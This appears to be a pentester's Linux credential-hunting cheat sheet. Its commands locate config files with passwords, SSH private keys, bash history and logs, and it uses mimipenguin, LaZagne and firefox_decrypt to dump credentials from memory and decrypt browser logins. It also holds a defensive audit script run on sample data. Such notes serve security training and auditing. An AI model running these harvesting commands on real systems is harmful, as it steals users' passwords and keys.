# Credential Hunting in Linux

### **Files**

```bash
# Configuration Files

# Find Configuration Files (the pattern is quoted so the shell does not expand the glob in the current directory)
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

# Search for user, password and pass strings in configuration files (commented lines are dropped)
for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "#";done

# Databases

# Find database files
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

# Notes: text files and files without an extension under the home directories
# (the parentheses are required; without them "-type f" only applies to the *.txt branch)
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \)

# Scripts

# Find Scripts with different Extensions
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
```

### **Cronjobs**

```bash
# find running Cron jobs 
cat /etc/crontab

ls -la /etc/cron.*/
```

### **SSH Keys**

```bash
# SSH Private Keys (-n prefixes the line number; ":1:" keeps only hits on line 1, i.e. the key header, and unlike ":1" does not also match lines 10, 11, ...)
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1:"

# SSH Public Keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1:"
```

### **History**

```bash
# Bash History (the glob also matches .bashrc and .bash_logout; use .bash_history to see only the command history)
tail -n5 /home/*/.bash*
```
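As an added example (not part of these notes), the following script turns the hunt above around into a defender's audit: it builds a constructed sample tree and then reports config files that carry an uncommented user/password assignment and private keys or shell history files that are readable by group or others. The function and file names are assumptions made for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: audit a tree for the artefacts the
# hunting commands above target, from the defender's side. Function and file
# names here are assumptions made for the demonstration.

# Constructed sample tree (labelled sample data, not real credentials).
make_sample_tree() {
  local d
  d=$(mktemp -d)
  mkdir -p "$d/etc" "$d/home/alice/.ssh"
  printf 'user = app\n# password = old\npassword = s3cret\n' > "$d/etc/app.cnf"
  printf 'loglevel = info\n' > "$d/etc/clean.conf"
  printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA\n-----END OPENSSH PRIVATE KEY-----\n' \
    > "$d/home/alice/.ssh/id_ed25519"
  chmod 644 "$d/home/alice/.ssh/id_ed25519"   # deliberately group/world readable
  printf 'mysql -u root -pHunter2\n' > "$d/home/alice/.bash_history"
  chmod 600 "$d/home/alice/.bash_history"     # correctly locked down
  echo "$d"
}

# Config files with an uncommented user/password assignment (a commented
# line such as "# password = old" is ignored, unlike a plain grep).
find_cred_configs() {
  find "$1" -type f \( -name '*.conf' -o -name '*.cnf' -o -name '*.config' \) \
    -exec grep -liE '^[[:space:]]*(pass(word)?|user(name)?)[[:space:]]*=' {} + 2>/dev/null
  return 0   # grep exits 1 when nothing matches; that is not an error here
}

# Private keys, PEM files and shell history readable by group or others
# (-perm /077: any group/other permission bit set). Public keys are skipped.
find_loose_secrets() {
  find "$1" -type f \( -name 'id_*' -o -name '*.pem' -o -name '.*_history' \) \
    ! -name '*.pub' -perm /077 2>/dev/null
}

# One tagged line per finding, so output can be diffed between runs.
audit_tree() {
  find_cred_configs "$1" | sed 's/^/CRED_IN_CONFIG /'
  find_loose_secrets "$1" | sed 's/^/LOOSE_PERMS /'
}

# Stand-alone run: build the constructed tree, audit it, clean up.
sample=$(make_sample_tree)
audit_tree "$sample"
rm -rf "$sample"
```

Point `audit_tree` at `/` (as root) to run the same checks over a real host; only the sample tree is constructed.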

### **Logs**

```bash
# Searching for interesting information in logs (the pattern is kept in a variable so it is not repeated;
# find is used instead of ls so files in sub-directories of /var/log keep their full path)
PATTERN="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs"
for i in $(find /var/log -type f 2>/dev/null);do GREP=$(grep "$PATTERN" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "$PATTERN" $i 2>/dev/null;fi;done
```

Many different logs exist on the system. These can vary depending on the applications installed, but here are some of the most important ones:

| Log File            | Description                                        |
| ------------------- | -------------------------------------------------- |
| /var/log/messages   | Generic system activity logs.                      |
| /var/log/syslog     | Generic system activity logs.                      |
| /var/log/auth.log   | (Debian) All authentication related logs.          |
| /var/log/secure     | (RedHat/CentOS) All authentication related logs.   |
| /var/log/boot.log   | Booting information.                               |
| /var/log/dmesg      | Hardware and drivers related information and logs. |
| /var/log/kern.log   | Kernel related warnings, errors and logs.          |
| /var/log/faillog    | Failed login attempts.                             |
| /var/log/cron       | Information related to cron jobs.                  |
| /var/log/mail.log   | All mail server related logs.                      |
| /var/log/httpd      | All Apache related logs.                           |
| /var/log/mysqld.log | All MySQL server related logs.                     |

### **Memory and Cache**

```bash
# Download - <https://github.com/huntergregal/mimipenguin>

# Memory - Mimipenguin (root is required to read other processes' memory)
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

# Memory - LaZagne
sudo python2.7 laZagne.py all
```

### **Browsers**

```bash
# Firefox Stored Credentials
ls -l .mozilla/firefox/ | grep default
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .

# Decrypting Firefox Credentials
# Decrypt tool - <https://github.com/unode/firefox_decrypt>
python3.9 firefox_decrypt.py

# LaZagne can also return results if the user has used a supported browser.
python3 laZagne.py browsers
```
